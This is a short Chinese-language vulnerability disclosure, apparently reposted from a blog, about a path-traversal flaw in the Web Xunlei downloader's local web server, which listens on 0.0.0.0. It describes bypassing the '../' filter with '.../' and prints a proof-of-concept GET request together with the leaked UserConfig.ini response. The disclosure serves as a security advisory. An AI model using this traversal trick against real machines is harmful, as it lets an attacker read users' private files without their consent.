漏洞详情
简要描述:
web迅雷在设计上和实现上存在问题,导致恶意***者可以读取安装有web迅雷的用户机器上的任意文件
详细说明:
web迅雷在本机存在有一webserver,并且绑定在0.0.0.0上,同时对于web请求处理并不恰当,存在安全缺陷导致恶意***者可以构造请求读取用户机器上的任意文件。
对于../跳目录的情况有处理,但是对于.../却可以绕过(某大师牛逼的分析思路,用file mon黑盒分析,赞!)
漏洞证明:
GET /.../Profiles/UserConfig.ini HTTP/1.1
HTTP/1.0 200 OK
Server: Xunlei Http Server/1.0Date: Tue, 23 Nov 2010 09:02:07 GMT
Content-type: *Content-length: 407Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT
[Skin]CurrSkin=default.rar
SkinNames=default.rar
[Monitor]ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.w
ma;.wmp;.wmv;.zip;.torrent;FilterSitesMax=20[EMuleGenericSettings]EMuleWatchLink=1[Update]RunUpdate=0[General]TaskShowPerPage=11[Antivirus]Protect=0FilePath=Parameter=[BHOSection]StatsDay=2[SavePath]SetFolderIcon=1Path=C:\Xunlei\
发送 43, r接受 579: 无sock
C:\Documents and Settings\Administrator>
站长评论:
这个很早就有了,不光是Web迅雷存在此问题,历代迅雷客户端都存在此问题,还可以远程溢出,原因是迅雷为了p2p传输,在本地开了一个80端口,用于传输p2p数据,然后你懂了……
很早之前,就在路由上屏蔽了对外80端口,该问题比较危险
转载于:https://blog.51cto.com/hellxman/744042